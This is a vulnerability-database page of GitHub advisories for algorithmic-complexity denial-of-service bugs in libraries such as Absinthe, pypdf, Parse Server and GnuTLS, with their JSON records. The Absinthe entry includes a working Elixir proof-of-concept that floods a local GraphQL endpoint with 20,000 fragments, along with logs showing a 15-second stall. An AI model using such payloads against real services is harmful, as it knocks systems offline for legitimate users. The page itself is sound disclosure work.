CWE-407
Allowed-with-ReviewInefficient Algorithmic Complexity
Abstraction: Class · Status: Incomplete
An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached.
193 vulnerabilities reference this CWE, most recent first.
GHSA-9F57-9RHG-4HVM
Vulnerability from github – Published: 2025-02-20 03:32 – Updated: 2025-02-20 20:18An issue was discovered in Kwik before 0.10.1. A hash collision vulnerability (in the hash table used to manage connections) allows remote attackers to cause a considerable CPU load on the server (a Hash DoS attack) by initiating connections with colliding Source Connection IDs (SCIDs).
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "tech.kwik:kwik"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-23020"
],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-20T20:18:50Z",
"nvd_published_at": "2025-02-20T03:15:12Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Kwik before 0.10.1. A hash collision vulnerability (in the hash table used to manage connections) allows remote attackers to cause a considerable CPU load on the server (a Hash DoS attack) by initiating connections with colliding Source Connection IDs (SCIDs).",
"id": "GHSA-9f57-9rhg-4hvm",
"modified": "2025-02-20T20:18:50Z",
"published": "2025-02-20T03:32:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23020"
},
{
"type": "WEB",
"url": "https://github.com/ptrd/kwik/commit/b0733d72bad76bc5d8df2f4a7792ebb2539ebdc8"
},
{
"type": "WEB",
"url": "https://github.com/ncc-pbottine/QUIC-Hash-Dos-Advisory"
},
{
"type": "PACKAGE",
"url": "https://github.com/ptrd/kwik"
},
{
"type": "WEB",
"url": "https://github.com/ptrd/kwik/releases/tag/v0.10.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Kwik hash collision vulnerability"
}
GHSA-9F7V-8M4P-PV76
Vulnerability from github – Published: 2022-05-24 17:03 – Updated: 2024-04-26 09:30knot-resolver before version 4.3.0 is vulnerable to denial of service through high CPU utilization. DNS replies with very many resource records might be processed very inefficiently, in extreme cases taking even several CPU seconds for each such uncached message. For example, a few thousand A records can be squashed into one DNS message (limit is 64kB).
{
"affected": [],
"aliases": [
"CVE-2019-19331"
],
"database_specific": {
"cwe_ids": [
"CWE-404",
"CWE-407"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-12-16T16:15:00Z",
"severity": "HIGH"
},
"details": "knot-resolver before version 4.3.0 is vulnerable to denial of service through high CPU utilization. DNS replies with very many resource records might be processed very inefficiently, in extreme cases taking even several CPU seconds for each such uncached message. For example, a few thousand A records can be squashed into one DNS message (limit is 64kB).",
"id": "GHSA-9f7v-8m4p-pv76",
"modified": "2024-04-26T09:30:33Z",
"published": "2022-05-24T17:03:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19331"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-19331"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00017.html"
},
{
"type": "WEB",
"url": "https://www.knot-resolver.cz/2019-12-04-knot-resolver-4.3.0.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9M86-7PMV-2852
Vulnerability from github – Published: 2026-03-02 22:03 – Updated: 2026-03-06 21:56Impact
An attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires accessing a stream which uses the /ASCIIHexDecode filter.
Patches
This has been fixed in pypdf==6.7.5.
Workarounds
If you cannot upgrade yet, consider applying the changes from PR #3666.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pypdf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.7.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28804"
],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-02T22:03:45Z",
"nvd_published_at": "2026-03-06T07:16:01Z",
"severity": "MODERATE"
},
"details": "### Impact\nAn attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires accessing a stream which uses the `/ASCIIHexDecode` filter.\n\n### Patches\nThis has been fixed in [pypdf==6.7.5](https://github.com/py-pdf/pypdf/releases/tag/6.7.5).\n\n### Workarounds\nIf you cannot upgrade yet, consider applying the changes from PR [#3666](https://github.com/py-pdf/pypdf/pull/3666).",
"id": "GHSA-9m86-7pmv-2852",
"modified": "2026-03-06T21:56:41Z",
"published": "2026-03-02T22:03:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-9m86-7pmv-2852"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28804"
},
{
"type": "WEB",
"url": "https://github.com/py-pdf/pypdf/pull/3666"
},
{
"type": "WEB",
"url": "https://github.com/py-pdf/pypdf/commit/648c627d2657447dfb1773412af05a0a5103b98f"
},
{
"type": "PACKAGE",
"url": "https://github.com/py-pdf/pypdf"
},
{
"type": "WEB",
"url": "https://github.com/py-pdf/pypdf/releases/tag/6.7.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "pypdf vulnerable to inefficient decoding of ASCIIHexDecode streams"
}
GHSA-9MHV-8H52-Q7Q2
Vulnerability from github – Published: 2026-05-14 13:08 – Updated: 2026-05-14 13:08Summary
An unauthenticated attacker can stall an Absinthe-backed GraphQL endpoint by submitting a query that contains many fragment definitions. The fragment-name uniqueness validation phase is O(N²) in the number of fragments, so a single modestly-sized request burns seconds of CPU per worker, and sustained traffic exhausts the worker pool (denial of service).
Introduced like with https://github.com/absinthe-graphql/absinthe/commit/0b46e3bcc06c0d3797bacd64761b908a84646c1d#diff-e540120c6a98cc1013be110d08e9d029511b9aabd26ad5f7f643c36834caac14
Details
Absinthe.Phase.Document.Validation.UniqueFragmentNames (lib/absinthe/phase/document/validation/unique_fragment_names.ex:14-40) walks every fragment in input.fragments via run/2, calling process/2 on each one. process/2 then calls duplicate?/2, which evaluates Enum.count(fragments, fn f -> f.name == name end) — a full linear scan of the fragment list — for every individual fragment. The result is N · N name comparisons per document.
input.fragments is built directly from the GraphQL query text the caller sends at the head of the pipeline, so N is attacker-controlled. A minimum-size fragment definition (fragment a on T{f}) is roughly 16 bytes, so a ~1 MB document carries ~60 000 fragments and forces ~3.6 × 10⁹ comparisons inside this one phase. Phoenix's default 8 MB body limit allows substantially larger blow-ups if operators have not lowered it. Nothing in this module caps N.
The fix is to aggregate names once per call rather than re-scanning per fragment, e.g.:
dups =
for {name, k} <- Enum.frequencies_by(input.fragments, & &1.name),
k > 1,
into: MapSet.new(),
do: name
and then check MapSet.member?(dups, fragment.name) inside process/2. That collapses the phase to O(N).
PoC
A standalone script that builds a GraphQL document with a large number of minimal fragment definitions, feeds it through Absinthe's pipeline, and times the UniqueFragmentNames phase is attached at the end of this report. Running it shows the validation time growing quadratically with the fragment count.
Impact
Algorithmic complexity / denial-of-service. Any service that exposes an Absinthe GraphQL endpoint to untrusted callers is affected: a single unauthenticated POST containing many fragment definitions pins a worker process for seconds, and modest sustained traffic exhausts the request-handling pool. No authentication, schema knowledge, or special configuration is required — only the ability to send a GraphQL query large enough to contain many fragments, which is permitted by Phoenix's default body-size limit.
Scripts and Logs
# Verifies: Quadratic fragment-name uniqueness check
Mix.install([
{:absinthe, "~> 1.7"},
{:absinthe_plug, "~> 1.5"},
{:bandit, "~> 1.0"},
{:plug, "~> 1.15"},
{:jason, "~> 1.4"},
{:req, "~> 0.5"}
])
defmodule VictimSchema do
use Absinthe.Schema
object :thing do
field :f, :string
end
query do
field :thing, :thing do
resolve(fn _, _ -> {:ok, %{f: "x"}} end)
end
end
end
defmodule VictimRouter do
use Plug.Router
plug :match
plug Plug.Parsers,
parsers: [:json],
pass: ["*/*"],
json_decoder: Jason
plug :dispatch
forward "/graphql",
to: Absinthe.Plug,
init_opts: [schema: VictimSchema]
match _ do
send_resp(conn, 404, "nope")
end
end
port = 47817
{:ok, _} = Bandit.start_link(plug: VictimRouter, port: port)
n = 20_000
fragments =
1..n
|> Enum.map(fn i -> "fragment f#{i} on Thing{f}" end)
|> Enum.join(" ")
query = "{ thing { f } } " <> fragments
IO.puts(
"Sending GraphQL document with #{n} fragment definitions (~#{div(byte_size(query), 1024)} KB) to 127.0.0.1:#{port}"
)
{us, response} =
:timer.tc(fn ->
Req.post!("http://127.0.0.1:#{port}/graphql",
json: %{query: query},
receive_timeout: 600_000,
retry: false
)
end)
ms = div(us, 1000)
IO.puts("HTTP response status: #{response.status}")
IO.puts("Total request elapsed (validation-dominated): #{ms} ms")
result =
if ms > 1000 do
"VERIFIED: ~#{n} fragments in one unauthenticated request forced #{ms} ms of CPU in Absinthe's UniqueFragmentNames phase (quadratic check)."
else
"NOT VERIFIED: elapsed #{ms} ms below DoS threshold"
end
IO.puts(result)
Logs
HTTP response status: 200
Total request elapsed (validation-dominated): 15451 ms
VERIFIED: ~20000 fragments in one unauthenticated request forced 15451 ms of CPU in Absinthe's UniqueFragmentNames phase (quadratic check).
{
"affected": [
{
"package": {
"ecosystem": "Hex",
"name": "absinthe"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-43967"
],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T13:08:44Z",
"nvd_published_at": "2026-05-08T16:16:12Z",
"severity": "HIGH"
},
"details": "### Summary\nAn unauthenticated attacker can stall an Absinthe-backed GraphQL endpoint by submitting a query that contains many fragment definitions. The fragment-name uniqueness validation phase is O(N\u00b2) in the number of fragments, so a single modestly-sized request burns seconds of CPU per worker, and sustained traffic exhausts the worker pool (denial of service).\n\nIntroduced like with https://github.com/absinthe-graphql/absinthe/commit/0b46e3bcc06c0d3797bacd64761b908a84646c1d#diff-e540120c6a98cc1013be110d08e9d029511b9aabd26ad5f7f643c36834caac14\n\n### Details\n`Absinthe.Phase.Document.Validation.UniqueFragmentNames` (`lib/absinthe/phase/document/validation/unique_fragment_names.ex:14-40`) walks every fragment in `input.fragments` via `run/2`, calling `process/2` on each one. `process/2` then calls `duplicate?/2`, which evaluates `Enum.count(fragments, fn f -\u003e f.name == name end)` \u2014 a full linear scan of the fragment list \u2014 for every individual fragment. The result is `N \u00b7 N` name comparisons per document.\n\n`input.fragments` is built directly from the GraphQL query text the caller sends at the head of the pipeline, so `N` is attacker-controlled. A minimum-size fragment definition (`fragment a on T{f}`) is roughly 16 bytes, so a ~1 MB document carries ~60 000 fragments and forces ~3.6 \u00d7 10\u2079 comparisons inside this one phase. Phoenix\u0027s default 8 MB body limit allows substantially larger blow-ups if operators have not lowered it. Nothing in this module caps `N`.\n\nThe fix is to aggregate names once per call rather than re-scanning per fragment, e.g.:\n\n```elixir\ndups =\n for {name, k} \u003c- Enum.frequencies_by(input.fragments, \u0026 \u00261.name),\n k \u003e 1,\n into: MapSet.new(),\n do: name\n```\n\nand then check `MapSet.member?(dups, fragment.name)` inside `process/2`. That collapses the phase to O(N).\n\n### PoC\nA standalone script that builds a GraphQL document with a large number of minimal fragment definitions, feeds it through Absinthe\u0027s pipeline, and times the `UniqueFragmentNames` phase is attached at the end of this report. Running it shows the validation time growing quadratically with the fragment count.\n\n### Impact\nAlgorithmic complexity / denial-of-service. Any service that exposes an Absinthe GraphQL endpoint to untrusted callers is affected: a single unauthenticated POST containing many fragment definitions pins a worker process for seconds, and modest sustained traffic exhausts the request-handling pool. No authentication, schema knowledge, or special configuration is required \u2014 only the ability to send a GraphQL query large enough to contain many fragments, which is permitted by Phoenix\u0027s default body-size limit.\n\n## Scripts and Logs\n\n```elixir\n# Verifies: Quadratic fragment-name uniqueness check\n\nMix.install([\n {:absinthe, \"~\u003e 1.7\"},\n {:absinthe_plug, \"~\u003e 1.5\"},\n {:bandit, \"~\u003e 1.0\"},\n {:plug, \"~\u003e 1.15\"},\n {:jason, \"~\u003e 1.4\"},\n {:req, \"~\u003e 0.5\"}\n])\n\ndefmodule VictimSchema do\n use Absinthe.Schema\n\n object :thing do\n field :f, :string\n end\n\n query do\n field :thing, :thing do\n resolve(fn _, _ -\u003e {:ok, %{f: \"x\"}} end)\n end\n end\nend\n\ndefmodule VictimRouter do\n use Plug.Router\n\n plug :match\n\n plug Plug.Parsers,\n parsers: [:json],\n pass: [\"*/*\"],\n json_decoder: Jason\n\n plug :dispatch\n\n forward \"/graphql\",\n to: Absinthe.Plug,\n init_opts: [schema: VictimSchema]\n\n match _ do\n send_resp(conn, 404, \"nope\")\n end\nend\n\nport = 47817\n{:ok, _} = Bandit.start_link(plug: VictimRouter, port: port)\n\nn = 20_000\n\nfragments =\n 1..n\n |\u003e Enum.map(fn i -\u003e \"fragment f#{i} on Thing{f}\" end)\n |\u003e Enum.join(\" \")\n\nquery = \"{ thing { f } } \" \u003c\u003e fragments\n\nIO.puts(\n \"Sending GraphQL document with #{n} fragment definitions (~#{div(byte_size(query), 1024)} KB) to 127.0.0.1:#{port}\"\n)\n\n{us, response} =\n :timer.tc(fn -\u003e\n Req.post!(\"http://127.0.0.1:#{port}/graphql\",\n json: %{query: query},\n receive_timeout: 600_000,\n retry: false\n )\n end)\n\nms = div(us, 1000)\nIO.puts(\"HTTP response status: #{response.status}\")\nIO.puts(\"Total request elapsed (validation-dominated): #{ms} ms\")\n\nresult =\n if ms \u003e 1000 do\n \"VERIFIED: ~#{n} fragments in one unauthenticated request forced #{ms} ms of CPU in Absinthe\u0027s UniqueFragmentNames phase (quadratic check).\"\n else\n \"NOT VERIFIED: elapsed #{ms} ms below DoS threshold\"\n end\n\nIO.puts(result)\n```\n\n\n### Logs\n\n```logs\nHTTP response status: 200\nTotal request elapsed (validation-dominated): 15451 ms\nVERIFIED: ~20000 fragments in one unauthenticated request forced 15451 ms of CPU in Absinthe\u0027s UniqueFragmentNames phase (quadratic check).\n```",
"id": "GHSA-9mhv-8h52-q7q2",
"modified": "2026-05-14T13:08:44Z",
"published": "2026-05-14T13:08:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43967"
},
{
"type": "WEB",
"url": "https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d"
},
{
"type": "WEB",
"url": "https://cna.erlef.org/cves/CVE-2026-43967.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/absinthe-graphql/absinthe"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/EEF-CVE-2026-43967"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Absinthe: Quadratic fragment-name uniqueness check"
}
GHSA-9R42-RHW3-2222
Vulnerability from github – Published: 2026-01-16 09:31 – Updated: 2026-02-27 22:05Mattermost versions 10.11.x <= 10.11.8 fail to validate input size before processing hashtags which allows an authenticated attacker to exhaust CPU resources via a single HTTP request containing a post with thousands space-separated tokens.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.11.8"
},
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "10.11.0"
},
{
"fixed": "10.11.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-14822"
],
"database_specific": {
"cwe_ids": [
"CWE-407",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-16T20:54:02Z",
"nvd_published_at": "2026-01-16T09:16:01Z",
"severity": "LOW"
},
"details": "Mattermost versions 10.11.x \u003c= 10.11.8 fail to validate input size before processing hashtags which allows an authenticated attacker to exhaust CPU resources via a single HTTP request containing a post with thousands space-separated tokens.",
"id": "GHSA-9r42-rhw3-2222",
"modified": "2026-02-27T22:05:20Z",
"published": "2026-01-16T09:31:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14822"
},
{
"type": "WEB",
"url": "https://github.com/mattermost/mattermost/commit/4d86263f5430d0eb991fc52ec886cf778cb072e6"
},
{
"type": "WEB",
"url": "https://github.com/mattermost/mattermost/commit/b3d6c0c564c1a79e54e5105d0a8b60fc58a2bdee"
},
{
"type": "PACKAGE",
"url": "https://github.com/mattermost/mattermost"
},
{
"type": "WEB",
"url": "https://mattermost.com/security-updates"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4325"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Mattermost is vulnerable to CPU exhaustion via crafted HTTP request"
}
GHSA-C2FH-M553-M5HP
Vulnerability from github – Published: 2022-05-14 01:14 – Updated: 2022-05-14 01:14The parse() method in the Email::Address module through 1.909 for Perl is vulnerable to Algorithmic complexity on specially prepared input, leading to Denial of Service. Prepared special input that caused this problem contained 30 form-field characters ("\f").
{
"affected": [],
"aliases": [
"CVE-2018-12558"
],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-06-20T14:29:00Z",
"severity": "HIGH"
},
"details": "The parse() method in the Email::Address module through 1.909 for Perl is vulnerable to Algorithmic complexity on specially prepared input, leading to Denial of Service. Prepared special input that caused this problem contained 30 form-field characters (\"\\f\").",
"id": "GHSA-c2fh-m553-m5hp",
"modified": "2022-05-14T01:14:04Z",
"published": "2022-05-14T01:14:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12558"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901873"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00012.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2018/06/19/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C2PC-G5QF-RFRF
Vulnerability from github – Published: 2024-12-09 20:42 – Updated: 2024-12-09 20:42Impact
Several polynomial time complexity issues in league/commonmark may lead to unbounded resource exhaustion and subsequent denial of service.
Malicious users could trigger that inefficient code with carefully crafted Markdown inputs that are specifically designed to ensure the worst-case performance is reached. Sending multiple such requests in parallel could tie up all available CPU resources and/or PHP-FPM processes, leading to denial of service for legitimate users.
Patches
These vulnerabilities have been patched in version 2.6.0. All users on older versions are highly encouraged to upgrade as soon as possible.
Workarounds
If you cannot upgrade, you may be able to mitigate the issues by:
- Setting very low
memory_limitandmax_execution_timePHP configurations to prevent runaway resource usage - Implementing rate-limiting, bot protection, or other approaches to reduce the risk of simultaneous bad requests hitting your site
- Limiting the size of inputs fed into this library (specifically the max length of each line)
- Limiting the use of this library to trusted users
References
Most of these issues were discovered in other Markdown parsers. You can read more about them here:
- https://github.com/commonmark/commonmark.js/issues/129
- https://github.com/commonmark/commonmark.js/issues/157
- https://github.com/commonmark/commonmark.js/issues/172
- https://github.com/github/cmark-gfm/security/advisories/GHSA-r572-jvj2-3m8p
- https://github.com/github/cmark-gfm/security/advisories/GHSA-24f7-9frr-5h2r
- https://github.com/github/cmark-gfm/security/advisories/GHSA-29g3-96g3-jg6c
- https://github.com/github/cmark-gfm/security/advisories/GHSA-r8vr-c48j-fcc5
- https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5
- https://github.com/github/cmark-gfm/security/advisories/GHSA-66g8-4hjf-77xh
For general information about this type of issue:
- https://en.wikipedia.org/wiki/Time_complexity
- https://cwe.mitre.org/data/definitions/407.html
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "league/commonmark"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-09T20:42:07Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nSeveral polynomial time complexity issues in league/commonmark may lead to unbounded resource exhaustion and subsequent denial of service.\n\nMalicious users could trigger that inefficient code with carefully crafted Markdown inputs that are specifically designed to ensure the worst-case performance is reached. Sending multiple such requests in parallel could tie up all available CPU resources and/or PHP-FPM processes, leading to denial of service for legitimate users.\n\n### Patches\n\nThese vulnerabilities have been patched in version 2.6.0. All users on older versions are highly encouraged to upgrade as soon as possible.\n\n### Workarounds\n\nIf you cannot upgrade, you may be able to mitigate the issues by:\n\n- Setting very low `memory_limit` and `max_execution_time` PHP configurations to prevent runaway resource usage\n- Implementing rate-limiting, bot protection, or other approaches to reduce the risk of simultaneous bad requests hitting your site\n- Limiting the size of inputs fed into this library (specifically the max length of each line)\n- Limiting the use of this library to trusted users\n\n### References\n\nMost of these issues were discovered in other Markdown parsers. You can read more about them here:\n\n* https://github.com/commonmark/commonmark.js/issues/129\n* https://github.com/commonmark/commonmark.js/issues/157\n* https://github.com/commonmark/commonmark.js/issues/172\n* https://github.com/github/cmark-gfm/security/advisories/GHSA-r572-jvj2-3m8p\n* https://github.com/github/cmark-gfm/security/advisories/GHSA-24f7-9frr-5h2r\n* https://github.com/github/cmark-gfm/security/advisories/GHSA-29g3-96g3-jg6c\n* https://github.com/github/cmark-gfm/security/advisories/GHSA-r8vr-c48j-fcc5\n* https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5\n* https://github.com/github/cmark-gfm/security/advisories/GHSA-66g8-4hjf-77xh\n\nFor general information about this type of issue:\n\n* https://en.wikipedia.org/wiki/Time_complexity\n* https://cwe.mitre.org/data/definitions/407.html\n",
"id": "GHSA-c2pc-g5qf-rfrf",
"modified": "2024-12-09T20:42:08Z",
"published": "2024-12-09T20:42:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/github/cmark-gfm/security/advisories/GHSA-24f7-9frr-5h2r"
},
{
"type": "WEB",
"url": "https://github.com/github/cmark-gfm/security/advisories/GHSA-29g3-96g3-jg6c"
},
{
"type": "WEB",
"url": "https://github.com/github/cmark-gfm/security/advisories/GHSA-66g8-4hjf-77xh"
},
{
"type": "WEB",
"url": "https://github.com/github/cmark-gfm/security/advisories/GHSA-r572-jvj2-3m8p"
},
{
"type": "WEB",
"url": "https://github.com/github/cmark-gfm/security/advisories/GHSA-r8vr-c48j-fcc5"
},
{
"type": "WEB",
"url": "https://github.com/github/cmark-gfm/security/advisories/GHSA-w4qg-3vf7-m9x5"
},
{
"type": "WEB",
"url": "https://github.com/thephpleague/commonmark/security/advisories/GHSA-c2pc-g5qf-rfrf"
},
{
"type": "WEB",
"url": "https://github.com/commonmark/commonmark.js/issues/129"
},
{
"type": "WEB",
"url": "https://github.com/commonmark/commonmark.js/issues/157"
},
{
"type": "WEB",
"url": "https://github.com/commonmark/commonmark.js/issues/172"
},
{
"type": "PACKAGE",
"url": "https://github.com/thephpleague/commonmark"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "league/commonmark\u0027s quadratic complexity bugs may lead to a denial of service"
}
GHSA-CGXM-VR2F-6FJ8
Vulnerability from github – Published: 2026-06-19 14:50 – Updated: 2026-06-19 14:50Impact
Parse Server is vulnerable to denial of service. A remote attacker can send a single, small query (~1 KB) containing deeply nested query condition operators. Parse Server processes the nested structure with exponential time complexity, which blocks the Node.js event loop and makes the server unresponsive to all clients for the duration of processing. A single request can occupy the event loop for many seconds, and the request is repeatable. The issue affects the REST API and LiveQuery query handling and is reachable in the default configuration. Exploitation requires only the public application identifier; no user authentication is needed.
Patches
The internal query-traversal helper that previously re-walked nested arrays — causing exponential-time processing of nested $or/$and/$nor operators — was corrected to traverse queries in linear time. Additionally, the optional requestComplexity.queryDepth limit was generalized so that nested logical operators are counted even when wrapped inside field-level operators (e.g. $elemMatch, $not) or plain field names, closing a bypass of the limit on both the REST API and LiveQuery.
Workarounds
There is no complete configuration-only workaround on affected versions. Setting requestComplexity.queryDepth to a small positive integer reduces exposure but does not fully prevent the issue, because the limit can be bypassed by nesting the operators inside a field-level operator. Upgrading is strongly recommended.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.9.1-alpha.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.6.82"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-19T14:50:14Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nParse Server is vulnerable to denial of service. A remote attacker can send a single, small query (~1 KB) containing deeply nested query condition operators. Parse Server processes the nested structure with exponential time complexity, which blocks the Node.js event loop and makes the server unresponsive to all clients for the duration of processing. A single request can occupy the event loop for many seconds, and the request is repeatable. The issue affects the REST API and LiveQuery query handling and is reachable in the default configuration. Exploitation requires only the public application identifier; no user authentication is needed.\n\n### Patches\n\nThe internal query-traversal helper that previously re-walked nested arrays \u2014 causing exponential-time processing of nested `$or`/`$and`/`$nor` operators \u2014 was corrected to traverse queries in linear time. Additionally, the optional `requestComplexity.queryDepth` limit was generalized so that nested logical operators are counted even when wrapped inside field-level operators (e.g. `$elemMatch`, `$not`) or plain field names, closing a bypass of the limit on both the REST API and LiveQuery.\n\n### Workarounds\n\nThere is no complete configuration-only workaround on affected versions. Setting `requestComplexity.queryDepth` to a small positive integer reduces exposure but does not fully prevent the issue, because the limit can be bypassed by nesting the operators inside a field-level operator. Upgrading is strongly recommended.",
"id": "GHSA-cgxm-vr2f-6fj8",
"modified": "2026-06-19T14:50:14Z",
"published": "2026-06-19T14:50:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-cgxm-vr2f-6fj8"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10511"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10512"
},
{
"type": "PACKAGE",
"url": "https://github.com/parse-community/parse-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "parse-server: Denial of service via exponential-time processing of deeply nested query operators"
}
GHSA-CQJ4-FP95-JQXQ
Vulnerability from github – Published: 2025-02-10 18:30 – Updated: 2026-05-12 12:32A flaw was found in GnuTLS, which relies on libtasn1 for ASN.1 data processing. Due to an inefficient algorithm in libtasn1, decoding certain DER-encoded certificate data can take excessive time, leading to increased resource consumption. This flaw allows a remote attacker to send a specially crafted certificate, causing GnuTLS to become unresponsive or slow, resulting in a denial-of-service condition.
{
"affected": [],
"aliases": [
"CVE-2024-12243"
],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-10T16:15:37Z",
"severity": "MODERATE"
},
"details": "A flaw was found in GnuTLS, which relies on libtasn1 for ASN.1 data processing. Due to an inefficient algorithm in libtasn1, decoding certain DER-encoded certificate data can take excessive time, leading to increased resource consumption. This flaw allows a remote attacker to send a specially crafted certificate, causing GnuTLS to become unresponsive or slow, resulting in a denial-of-service condition.",
"id": "GHSA-cqj4-fp95-jqxq",
"modified": "2026-05-12T12:32:12Z",
"published": "2025-02-10T18:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12243"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:17361"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:4051"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:7076"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:8020"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:8385"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-12243"
},
